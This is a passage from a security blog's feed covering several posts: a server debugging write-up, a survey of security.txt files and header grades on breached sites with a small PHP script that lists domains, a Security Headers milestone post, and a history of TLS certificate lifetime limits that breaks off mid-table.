Sep 18 22:58:01 delete-me ool www: JSON decode failed: 1001553 65536</code></pre><p></p><p>The <strong>exact</strong> same problem!! The payload was even truncated at the exact same size, which perhaps makes sense because the server has the same resources so probably the same default values around <code>tcp_mem</code>. This was great to see. I could reliably reproduce the problem which means that now it&apos;s identified, the fix should be good to go.</p><p></p><h4 id="fixing-the-issue">Fixing the issue</h4><p>By now, it&apos;s pretty clear what the fix is and it didn&apos;t take much effort to implement the changes.</p><p>The first and immediate change was for the <code>batch_reject()</code> code to use the User Entity Cache service for querying the existence of users. This should all but eliminate any querying against Table Storage and even if queries were triggered, they would be to query the existence of a single user and not to query out our entire user list.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image-14.png" class="kg-image" alt="Unravelling The Mystery Of Truncated POST Requests On Report URI" loading="lazy" width="1114" height="328" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/09/image-14.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/09/image-14.png 1000w, https://scotthelme.co.uk/content/images/2023/09/image-14.png 1114w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Quite a small change to make quite a big impact!</p><p>My next change will be to shift this code from the ingestion servers to the consumer servers instead. The consumers have far less pressure and given the volume of reports flowing through the ingestion servers, they just need to get out of the way and push reports into Redis as efficiently as possible. That&apos;s a ticket for another day, though, because the main focus was to avoid seeing this issue again and I&apos;m happy to say that since the fix was deployed, it hasn&apos;t happened again. Not only that, I&apos;m seeing a reduction in the transactions against Table Storage and generally lower CPU usage across the ingestion servers. All is good.</p><p></p><h4 id="phew">Phew!</h4><p>That was quite the post, and I hope it was interesting to follow along! Even though the issue was finally resolved, I did still have a few questions left outstanding after this and maybe someone out there can help?</p><p></p><h6 id="should-nginx-pass-these-requests-through">Should Nginx pass these requests through?</h6><p>I never fully investigated the cause of the truncated payloads because that seemed to be a symptom of the problem rather than the problem itself. My current theory is that the inbound connections were being terminated and the partial payload received was then being processed by Nginx. In this scenario, I was surprised that Nginx would pass it through to PHP, but maybe there&apos;s a good reason for that and someone can share it below! I&apos;d have thought that requests like this would not make it beyond Nginx and they&apos;d show up in the error log.</p><p></p><h6 id="why-is-php-processing-these-requests">Why is PHP processing these requests?</h6><p>This is dependent on the answer to the above, but there is also the possibility that Nginx is sending the full request through, but I don&apos;t believe so based on the logs from Nginx, and that PHP is cutting short the payload when receiving it. Either way, I&apos;m not sure why PHP would try to process only a partial request whether it was cut short from Nginx or PHP.</p><p></p><h6 id="how-should-i-tune-tcpmem">How should I tune tcp_mem? </h6><p>I&apos;ve read a <em>lot</em> about how to do this but can&apos;t say I&apos;ve walked away with a definitive answer, if one even exists. Our ingestion servers have more than enough resources and no other burdens, so for now, I&apos;ve given a modest increase in the <code>pressure</code> and <code>high</code> values, but they could probably do with having a little more thought put into them.</p><p></p><p>I think I&apos;ve had enough of fighting fires so I&apos;ll get back to writing code and building new features &#x1F60E;</p><p></p><p><strong><em>Update 2nd Oct 2023:</em></strong> I&apos;ve published a second blog post with further debugging and information - <a href="https://scotthelme.co.uk/processing-truncated-requests-php-debugging-deep-dive/?ref=scotthelme.co.uk" rel="noreferrer">Processing Truncated Requests? A PHP Debugging Deep Dive</a></p><p></p>]]></content:encoded></item><item><title><![CDATA[Do breached sites take security seriously?]]></title><description><![CDATA[<p>Over the weekend, I saw a tweet from Troy Hunt who posed a little project idea. Having heaps of spare time... I thought I&apos;d take on the challenge and see if I could help!</p><p></p><h4 id="the-idea">The idea</h4><p>As I&apos;m sure many of you know, Troy runs <a href="https://haveibeenpwned.com/?ref=scotthelme.co.uk">Have</a></p>]]></description><link>https://scotthelme.co.uk/do-breached-sites-take-security-seriously/</link><guid isPermaLink="false">64bfe522aabfe60001bdb9dc</guid><category><![CDATA[Security Headers]]></category><category><![CDATA[security.txt]]></category><category><![CDATA[Have I Been Pwned]]></category><category><![CDATA[Probely]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 26 Jul 2023 14:24:43 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/07/hibp.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/07/hibp.png" alt="Do breached sites take security seriously?"><p>Over the weekend, I saw a tweet from Troy Hunt who posed a little project idea. Having heaps of spare time... I thought I&apos;d take on the challenge and see if I could help!</p><p></p><h4 id="the-idea">The idea</h4><p>As I&apos;m sure many of you know, Troy runs <a href="https://haveibeenpwned.com/?ref=scotthelme.co.uk">Have I Been Pwned</a>, a site that tracks data breaches and allows people or organisations to be alerted to their exposure. Of course, after a data breach, one might wonder how seriously a website takes security, given the event.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-10.png" class="kg-image" alt="Do breached sites take security seriously?" loading="lazy" width="721" height="114" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-10.png 600w, https://scotthelme.co.uk/content/images/2023/07/image-10.png 721w" sizes="(min-width: 720px) 720px"></figure><p></p><!--kg-card-begin: html--><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">Looking for a little project to keep you busy on the weekend? I was just thinking: how many of the breached websites in <a href="https://twitter.com/haveibeenpwned?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@haveibeenpwned</a> now have a security.txt file? So, if you feel like grabbing those domains and querying them all, there&apos;s an API here: <a href="https://t.co/ftiKkfH7Hp?ref=scotthelme.co.uk">https://t.co/ftiKkfH7Hp</a></p>&#x2014; Troy Hunt (@troyhunt) <a href="https://twitter.com/troyhunt/status/1682982538409828354?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">July 23, 2023</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><!--kg-card-end: html--><p></p><p>That sounds simple enough, let&apos;s get on it!</p><p></p><h4 id="crawlerninja">Crawler.Ninja</h4><p>I have another project called <a href="https://crawler.ninja/?ref=scotthelme.co.uk">https://crawler.ninja</a>, where I scan the top 1,000,000 sites in the World every day and analyse various aspects of their security. You can see a summary of the daily scan data, or, access a dump of all historic scan data, but be warned, there are now many terabytes(!) of historic data!</p><p>I sliced out a bit of the crawler code because I already look for the presence of the <a href="https://scotthelme.co.uk/say-hello-to-security-txt/?ref=scotthelme.co.uk">security.txt</a> file that Troy was asking for, and then I could run the scan against the list of breached domains from HIBP. Pulling the list of domains for all the breaches in HIBP is easy, <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/getUniqueBreachDomains.php?ref=scotthelme.co.uk">here&apos;s my code</a> to do it.</p><p></p><pre><code class="language-php">&lt;?php

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, &apos;https://haveibeenpwned.com/api/v3/breaches&apos;);
$response = curl_exec($ch);
$breachList = json_decode($response, true);
$domainList = [];
foreach ($breachList as $breach) {
	if (isset($breach[&apos;Domain&apos;]) &amp;&amp; trim(strtolower($breach[&apos;Domain&apos;])) !== &apos;&apos;) {
		$domainList[] = trim(strtolower($breach[&apos;Domain&apos;]));
	}
}
$domainList = array_unique($domainList);
foreach ($domainList as $domain) {
	file_put_contents(&apos;output.txt&apos;, $domain . &quot;\r\n&quot;, FILE_APPEND | LOCK_EX);
}</code></pre><p></p><p>Here&apos;s the list of <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/output.txt?ref=scotthelme.co.uk">641 unique domains</a> that I found and that I used for analysis.</p><p></p><h4 id="securitytxt">Security.txt</h4><p>The idea of the <a href="https://scotthelme.co.uk/say-hello-to-security-txt/?ref=scotthelme.co.uk">security.txt</a> is really quite simply and it&apos;s explained in that blog post, but the TLDR; you can put contact info in a text file in this specified location for people to reach you when things go bad. You can see I have one of these files on my important sites:</p><p><a href="https://scotthelme.co.uk/.well-known/security.txt?ref=scotthelme.co.uk">https://scotthelme.co.uk/.well-known/security.txt</a><br><a href="https://securityheaders.com/.well-known/security.txt?ref=scotthelme.co.uk">https://securityheaders.com/.well-known/security.txt</a><br><a href="https://report-uri.com/.well-known/security.txt?ref=scotthelme.co.uk">https://report-uri.com/.well-known/security.txt</a></p><p></p><p>There are some specific requirements on where to host this file and how to present it in <a href="https://datatracker.ietf.org/doc/html/rfc9116?ref=scotthelme.co.uk">RFC 9116</a>, but for the most part, it seems that people get it right. Notably, the following:</p><p></p><blockquote>For web-based services, organizations MUST place the &quot;security.txt&quot; file under the &quot;/.well-known/&quot; path<br><br>The file MUST be accessed via HTTP 1.0 or a higher version, and the file access MUST use the &quot;https&quot; scheme<br><br>It MUST have a Content-Type of &quot;text/plain&quot; with the default charset parameter set to &quot;utf-8&quot;<br><br>This field [Contact] MUST always be present in a &quot;security.txt&quot; file.</blockquote><p></p><p>It seems the biggest failure of sites that attempt to meet the requirements is to have a <code>content-type</code> of <code>text\plain</code> instead of the required <code>text\plain; charset=utf-8</code>. For this analysis, I&apos;m going to take a slightly more relaxed approach and allow <code>text\plain</code> but I&apos;ve also provided the list of compliant sites with the more strict check too. </p><p>On the <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityTxtSitesStrict.txt?ref=scotthelme.co.uk">strict check</a>, only 6 sites out of the 641 checked have a security.txt file and on the <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityTxtSitesRelaxed.txt?ref=scotthelme.co.uk">relaxed check</a>, it&apos;s slightly better at 11... That means we&apos;re only seeing around 1.7% of these sites using security.txt files!</p><p></p><h4 id="security-headers">Security Headers</h4><p>Whilst I was doing this security analysis, I figured I could quickly and easily extend this to add some more value. Regular readers will know of my <a href="https://securityheaders.com/?ref=scotthelme.co.uk">Security Headers</a> project that recently joined <a href="https://scotthelme.co.uk/security-headers-is-joining-probely/?ref=scotthelme.co.uk">Probely</a>, where you can do a free security scan of your website in ~2 seconds! Well, Security Headers also has <a href="https://scotthelme.co.uk/announcing-the-new-security-headers-api-new-features-and-upgrades/?ref=scotthelme.co.uk">an API</a> so I wrote a quick <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityHeadersApiClient.php?ref=scotthelme.co.uk">API client</a> to run the list of HIBP domains against the Security Headers API too. You can see the <a href="https://github.com/ScottHelme/hibp-breached-sites-security-analysis/blob/main/securityHeadersGrade.txt?ref=scotthelme.co.uk">raw results</a> to do your own analysis, but I think this graph nicely summarises that things aren&apos;t as good as they could be.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-9.png" class="kg-image" alt="Do breached sites take security seriously?" loading="lazy" width="1877" height="1059" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-9.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-9.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image-9.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image-9.png 1877w" sizes="(min-width: 720px) 720px"></figure><p></p><p>There were a handful of domains that don&apos;t resolve, some that blocked our scanner outright and some that didn&apos;t respond to the scanner, but we got a successful scan on 483 domains show in the data. Here&apos;s how the scores break down for them.</p><p></p><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th>Grade</th>
<th>Sites</th>
</tr>
</thead>
<tbody>
<tr>
<td>A+</td>
<td>1</td>
</tr>
<tr>
<td>A</td>
<td>68</td>
</tr>
<tr>
<td>B</td>
<td>41</td>
</tr>
<tr>
<td>C</td>
<td>58</td>
</tr>
<tr>
<td>D</td>
<td>141</td>
</tr>
<tr>
<td>E</td>
<td>0</td>
</tr>
<tr>
<td>F</td>
<td>174</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p></p><p>Surprisingly it&apos;s not <em>too</em> bad, but there was only a <a href="https://securityheaders.com/?q=catho.com.br&amp;followRedirects=on&amp;ref=scotthelme.co.uk">single site</a> that got an A+, on a list of a some really, really big sites.</p><p>It will be interesting to see how this tracks in the future and whether or not the presence of something like a security.txt file, or even your score on Security Headers, can be used in any way as indicator of how seriously you take security! &#x1F914;</p><p></p><p>Want to try the <a href="https://securityheaders.com/api/?ref=scotthelme.co.uk">Security Headers API</a>? Get 10% off your first 3 months with <strong>HIBP10</strong> at checkout!</p><p></p>]]></content:encoded></item><item><title><![CDATA[Celebrating 250,000,000 scans on Security Headers! 🥳🎉]]></title><description><![CDATA[<p>As I sit and write this blog post I still find it absolutely unreal how far this little idea, that I had all of those years ago, has come! Let&apos;s take a look back at the journey of Security Headers so far, and the journey ahead.</p><p></p><figure class="kg-card kg-image-card"><a href="https://securityheaders.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/07/image-8.png" class="kg-image" alt loading="lazy" width="300" height="42"></a></figure><p></p><h4 id="humble-beginnings">Humble Beginnings</h4>]]></description><link>https://scotthelme.co.uk/celebrating-250-000-000-scans-on-security-headers/</link><guid isPermaLink="false">64aeaaf4b2742600011abd3a</guid><category><![CDATA[Security Headers]]></category><category><![CDATA[Probely]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Wed, 19 Jul 2023 08:53:16 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/07/scans.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/07/scans.png" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;"><p>As I sit and write this blog post I still find it absolutely unreal how far this little idea, that I had all of those years ago, has come! Let&apos;s take a look back at the journey of Security Headers so far, and the journey ahead.</p><p></p><figure class="kg-card kg-image-card"><a href="https://securityheaders.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/07/image-8.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="300" height="42"></a></figure><p></p><h4 id="humble-beginnings">Humble Beginnings</h4><p>All the way back in Feb 2015, I was really starting to dig into the analysis of <a href="https://securityheaders.com/?ref=scotthelme.co.uk">Security Headers</a> on other sites and after getting bored of digging around in Dev Tools, I created a tool to make it easy for me. Outlined in my blog, <a href="https://scotthelme.co.uk/introducing-securityheaders-io/?ref=scotthelme.co.uk">Introducing SecurityHeaders.io</a>, I launched the first version of the site, which looked very different to how it does today!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-4.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="1111" height="577" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-4.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-4.png 1000w, https://scotthelme.co.uk/content/images/2023/07/image-4.png 1111w" sizes="(min-width: 720px) 720px"></figure><p></p><p>There was no scoring, no nice layout, it was simple and basic but it got the job done.</p><p>Less than a year later, though, in Dec 2015, I published <a href="https://scotthelme.co.uk/launching-the-new-version-of-securityheaders-io/?ref=scotthelme.co.uk">Launching the new version of securityheaders.io</a>, which introduced scoring for your A+ to F grade and the visuals that will be familiar with you today. The scoring was inspired by SSL Labs after I&apos;d noticed how much people will &apos;chase the grade&apos;. If you tell someone they got a grade B, they almost naturally want to improve that, and I wanted to harness that same gamification that SSL Labs had for SSL configuration and put it to good use for Security Headers configurations!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-5.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="997" height="641" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-5.png 600w, https://scotthelme.co.uk/content/images/2023/07/image-5.png 997w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Just a few months later and Security Headers made it to the front page of Hacker News and things really began to take off! It could have been the gamification of the grading, or just a friendly user sharing a link for us, but it resonated well with the community and we got a huge swell of support.</p><p></p><!--kg-card-begin: html--><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">A day on the front page of Hacker News and <a href="https://twitter.com/securityheaders?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@securityheaders</a> has just passed 250,000 scans!!! <a href="https://t.co/ED7qlqDKix?ref=scotthelme.co.uk">pic.twitter.com/ED7qlqDKix</a></p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/697874135494631424?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 11, 2016</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><!--kg-card-end: html--><p></p><p>250,000 scans was a <em>really</em> big deal for me back then, and it&apos;s pretty wild to think that we&apos;ve added another 3 zeros since, but I had absolutely no idea that this was only the beginning!</p><p></p><h4 id="continuing-to-grow">Continuing To Grow</h4><p>As the months and years ticked by, we continued to cross through some awesome milestones. As each one came and rolled by, I still couldn&apos;t believe just how popular the site was becoming and the site seemed to be growing in popularity at &#xA0;a relentless pace.</p><p></p><!--kg-card-begin: html--><blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">Overnight we passed through 1,000,000 scans! &#x1F389;&#x1F389;&#x1F389; <a href="https://t.co/lh6PR1Ds56?ref=scotthelme.co.uk">pic.twitter.com/lh6PR1Ds56</a></p>&#x2014; Security Headers (@securityheaders) <a href="https://twitter.com/securityheaders/status/751314498204631040?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">July 8, 2016</a></blockquote><br>

<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">We passed through 10,000,000 scans!!! &#x1F389;&#x1F389;&#x1F389; <a href="https://t.co/NGnYZqJyBP?ref=scotthelme.co.uk">pic.twitter.com/NGnYZqJyBP</a></p>&#x2014; Security Headers (@securityheaders) <a href="https://twitter.com/securityheaders/status/964167638413955072?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">February 15, 2018</a></blockquote><br>

<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">We&apos;re so grateful to have <a href="https://twitter.com/probely?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@probely</a> sponsoring us and supporting the project! As we fast approach 100,000,000 scans, having their support is essential to keep the service free and available for everyone. Check them out here: <a href="https://t.co/x8xVG5TjW7?ref=scotthelme.co.uk">https://t.co/x8xVG5TjW7</a> &#x2764; <a href="https://t.co/6C4LXCWLLZ?ref=scotthelme.co.uk">pic.twitter.com/6C4LXCWLLZ</a></p>&#x2014; Security Headers (@securityheaders) <a href="https://twitter.com/securityheaders/status/1301079282312196096?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">September 2, 2020</a></blockquote><!--kg-card-end: html--><p></p><p>Very quickly we hit 100,000,000 scans in Sep 2020 and I really felt like I&apos;d made something to be proud of. One of the most notable memories I have around that time was of an old colleague and friend sharing a penetration test report with me that they&apos;d received and in it, a screenshot from the Security Headers site!! Their guidance was that they needed to improve their HTTP Response Headers and Security Headers had established itself as such a reputable player in the industry, they were happy to refer to us as their proof with a grade F! If you&apos;ve got any similar stories, or places that you&apos;ve seen Security Headers linked or referenced, please let me know in the comments below, it&apos;d be awesome to see.</p><p>In that very same month, we also announced our newest sponsor, <a href="https://probely.com/?utm_source=securityheading&amp;utm_medium=display&amp;utm_campaign=logo">Probely</a>, who were one of only a few companies to ever come forwards and support this free tool used by so many. This sponsorship would turn out to be our longest standing, and most supportive, eventually culminating in an even larger announcement. The growth of the site continued and Security Headers added more powerful capabilities and became yet more popular. As the awareness around Cyber Security continued to rise, or as more people just shared a link to this free tool, the numbers grew and grew.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-6.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="1958" height="1076" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-6.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-6.png 1000w, https://scotthelme.co.uk/content/images/size/w1600/2023/07/image-6.png 1600w, https://scotthelme.co.uk/content/images/2023/07/image-6.png 1958w" sizes="(min-width: 720px) 720px"></figure><p></p><p>You can see the clear upward kick in our scan numbers from Feb 2019 onwards, and whilst I don&apos;t know exactly what happened to cause that, it&apos;s been a mega journey to see it not only grow the way it has, but to continue to maintain that growth too. </p><p></p><h4 id="to-the-future">To The Future</h4><p>Regular readers will know that just a few weeks back, I announced that <a href="https://scotthelme.co.uk/security-headers-is-joining-probely/?ref=scotthelme.co.uk">Security Headers is joining Probely</a>. That blog post outlines all of the details so you can head over there if you want the lowdown, but one of things that I said in that announcement was that Security Headers would live on exactly as you knew it before. And it has.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/07/image-7.png" class="kg-image" alt="Celebrating 250,000,000 scans on Security Headers! &#x1F973;&#x1F389;" loading="lazy" width="1240" height="858" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/07/image-7.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/07/image-7.png 1000w, https://scotthelme.co.uk/content/images/2023/07/image-7.png 1240w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Security Headers is continuing to see the same rate of growth under Probely that it did previously and we&apos;re currently working on things behind the scenes to make that even better. My previous blog post on Security Headers <a href="https://scotthelme.co.uk/announcing-the-new-security-headers-api-new-features-and-upgrades/?ref=scotthelme.co.uk">announced our new API</a> so you can easily, and cheaply, automate the regular scanning of your websites and I&apos;m also really happy to see great growth there too.</p><p>All in all, I couldn&apos;t be more pleased with how things are working out for this little tool that I built to make my life a little easier and then decided to share with the World! Hopefully I&apos;ll see you back here in 2024 for the 300,000,000 scans announcement &#x1F60E;</p><p></p>]]></content:encoded></item><item><title><![CDATA[Cryptographic Agility Part 1: Server Certificates]]></title><description><![CDATA[<p>We&apos;ve encountered a lot of problems of our own making in the TLS/PKI ecosystem in recent years, and whilst we&apos;ve got better at dealing with them and even avoiding them, there&apos;s still a way to go. </p><p></p><h4 id="certificate-lifetime">Certificate Lifetime</h4><p>The focus of these blog</p>]]></description><link>https://scotthelme.co.uk/cryptographic-agility-part-1-server-certificates/</link><guid isPermaLink="false">64a423acdb9bbf00018bb12a</guid><category><![CDATA[TLS]]></category><category><![CDATA[PKI]]></category><category><![CDATA[Certificate Transparency]]></category><category><![CDATA[Let's Encrypt]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Fri, 14 Jul 2023 09:57:35 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/07/validity-period.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/07/validity-period.png" alt="Cryptographic Agility Part 1: Server Certificates"><p>We&apos;ve encountered a lot of problems of our own making in the TLS/PKI ecosystem in recent years, and whilst we&apos;ve got better at dealing with them and even avoiding them, there&apos;s still a way to go. </p><p></p><h4 id="certificate-lifetime">Certificate Lifetime</h4><p>The focus of these blog posts will be on the maximum allowed validity period of certificates, but not just the certificates used by websites, we&apos;ll be taking a look at CA certificates too. To get started, I&apos;ll be looking at the certificates that almost all of us use, and that&apos;s the certificates we all get so we can have HTTPS on our websites! I&apos;ll refer to them throughout as server certificates, but you may have come across them being called HTTPS certificates, SSL certificates, end-entity certificates, or one of a few other terms too!</p><p>Let&apos;s have a brief look at the history of certificates and if we roll back the clock far enough, there was a time when there wasn&apos;t a defined cap on the maximum validity period of a certificate. Before July 2012 you could go wild and it&apos;s easy to come across certificates that were issued with a validity period of 9 or even <em>10 years</em>! [<a href="https://search.censys.io/certificates/a50442b0925c7fe6423f1f832070a76d120dd1709514e5504dfa4b30cbffd509?ref=scotthelme.co.uk">1</a>][<a href="https://search.censys.io/certificates/458ecc66d7c78bc35eb4dd094d7fb4c484f27a6d5d1adb087b6d2f0afc1b14bc?ref=scotthelme.co.uk">2</a>]</p><p>Thinking about that now is absolutely mind blowing and we&apos;ve chopped that down to just a fraction of what it used to be, and here&apos;s how we got here.</p><p></p><h4 id="60-months">60 Months</h4><p>The first time a limit was set on the validity period of a publicly-trusted certificate was in <a href="https://cabforum.org/wp-content/uploads/Baseline_Requirements_V1.pdf?ref=scotthelme.co.uk">v1.0 of the Baseline Requirements</a>. In &#xA7;9.4 of that very first document, you can find the following:</p><p></p><blockquote>Certificates issued after the Effective Date MUST have a Validity Period no greater than 60 months. </blockquote><p></p><p>With an effective date of 1st July 2012, we saw the introduction of a limit that reduced certificates to being valid for &quot;<em>only&quot;</em> 5 years... That&apos;s pretty wild, and still completely inappropriate by today&apos;s standards, but that was a reduction from the 9 or 10 years you could see back then.</p><p></p><h4 id="39-months">39 Months</h4><p>The next reduction in certificate lifetime came on 1st April 2015 in <a href="https://cabforum.org/wp-content/uploads/CAB-Forum-BR-1.3.0.pdf?ref=scotthelme.co.uk">v1.3.0 of the Baseline Requirements</a>, and that saw the follow stipulation in &#xA7;6.3.2:</p><p></p><blockquote>Certificates issued after 1 April 2015 MUST have a Validity Period no greater than 39 months</blockquote><p></p><p>A step in the right direction for sure, but this was still far too long, and there are many good reasons why, a few of which I detail <a href="https://scotthelme.co.uk/why-we-need-to-do-more-to-reduce-certificate-lifetimes/?ref=scotthelme.co.uk">here</a>.</p><p></p><h4 id="825-days">825 Days</h4><p>As time progressed, we saw the next reduction in certificate lifetime come on 1st March 2018 in <a href="https://cabforum.org/wp-content/uploads/CA-Browser-Forum-BR-1.4.4.pdf?ref=scotthelme.co.uk">v1.4.4 of the Baseline Requirements</a>, which set out in &#xA7;6.3.2:</p><p></p><blockquote>Certificates issued after 1 March 2018 MUST have a Validity Period no greater than 825 days</blockquote><p></p><p>At this stage, certificates are getting to close to what has always been my recommendation of 12 months being the absolute limit, but we started to encounter some real friction from here.</p><p></p><h4 id="398-days">398 Days</h4><p>The industry tried to push through the idea of 398 day certificates before we had 825 day certificates, but the vote failed. <a href="https://cabforum.org/2017/02/24/ballot-185-limiting-lifetime-certificates/?ref=scotthelme.co.uk">Ballot 185</a> called for 398 day certificates from 24th August 2017 and was met with widespread resistance from major CA players in the industry. The 825 day certificates vote was seen as the compromise and passed, but it was inevitable that 398 day certificates would be proposed again. </p><p>I gave <a href="https://scotthelme.co.uk/ballot-sc22-reduce-certificate-lifetimes/?ref=scotthelme.co.uk">widespread coverage</a> to the next ballot, <a href="https://cabforum.org/2019/09/10/ballot-sc22-reduce-certificate-lifetimes-v2/?ref=scotthelme.co.uk">SC22</a>, which again proposed that certificates be reduced to 398 days in validity and again, failed. The reasons presented by those in the industry who wanted this change were all valid and they sought to resolve genuine concerns, I even covered many of them myself in &apos;<a href="https://scotthelme.co.uk/why-we-need-to-do-more-to-reduce-certificate-lifetimes/?ref=scotthelme.co.uk">Why we need to do more to reduce certificate lifetimes</a>&apos;. Having failed twice to shorten certificates, a key player in the ecosystem was to step up and in the interests of improving security for their users and single-handedly push through this change. </p><p>It was a surprise to see Apple announce this, but their &apos;<a href="https://support.apple.com/en-gb/HT211025?ref=scotthelme.co.uk">About upcoming limits on trusted certificates</a>&apos; is short and sweet.</p><p></p><blockquote>TLS server certificates issued on or after 1 September 2020 00:00 GMT/UTC must not have a validity period greater than 398 days.</blockquote><p></p><p>Published on 11th March 2020, the announcement gave the industry 6 months of advanced warning and showed that Apple was serious about improving the health of the ecosystem. Shorter certificates were coming, and while Apple was making it happen, <a href="https://chromium.googlesource.com/chromium/src/+/ae4d6809912f8171b23f6aa43c6a4e8e627de784?ref=scotthelme.co.uk">Google</a> and <a href="https://blog.mozilla.org/security/2020/07/09/reducing-tls-certificate-lifespans-to-398-days/?ref=scotthelme.co.uk">Mozilla</a> stood with them. With this change now being effectively a mandatory change, ballot SC31 &apos;<a href="https://cabforum.org/2020/07/16/ballot-sc31-browser-alignment/?ref=scotthelme.co.uk">Browser Alignment</a>&apos; solidified the 398 day validity period in the Baseline Requirements V1.7.7 &#xA7;6.3.2:</p><p></p><blockquote>Subscriber Certificates issued on or after 1 September 2020 SHOULD NOT have a Validity Period greater than 397 days and MUST NOT have a Validity Period greater than 398 days.</blockquote><p></p><h4 id="where-to-next">Where to next?</h4><p>For a long while now, I&apos;ve been eagerly awaiting the announcement of the next reduction in certificate lifetime and it hasn&apos;t yet arrived. I think the pandemic certainly didn&apos;t help, but still, I feel we&apos;re now overdue for the next step.</p><p>Keeping a close eye on things happening in the industry, I have seen a few changes that could be interpreted as an indication that another announcement is definitely coming, and they also hint at what that next step might be. </p><p></p><h4 id="certificate-transparency-policy">Certificate Transparency Policy</h4><p>If you aren&apos;t familiar with Certificate Transparency, I have an <a href="https://scotthelme.co.uk/certificate-transparency-an-introduction/?ref=scotthelme.co.uk">introductory blog post</a> that should help you get started. To give a TLDR; here, CT logs are public logs that contain all certificates so that the existence of any certificate can&apos;t be hidden and certificates can&apos;t be issued in secret. The number of logs a certificate must be written to depends on how long the certificate is valid for, with longer certificates needing to be written to more logs. </p><p>Both Apple and Google have had their own CT policy requirements for some time now, and they looked like this.</p><p></p><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th style="text-align:center">Certificate Lifetime</th>
<th style="text-align:center">Number of SCTs from distinct CT Logs</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">&lt; 15 months</td>
<td style="text-align:center">2</td>
</tr>
<tr>
<td style="text-align:center">&gt;= 15 and &lt;= 27 months</td>
<td style="text-align:center">3</td>
</tr>
<tr>
<td style="text-align:center">&gt; 27 and &lt;= 39 months</td>
<td style="text-align:center">4</td>
</tr>
<tr>
<td style="text-align:center">&gt; 39 months</td>
<td style="text-align:center">5</td>
</tr>
</tbody>
</table>
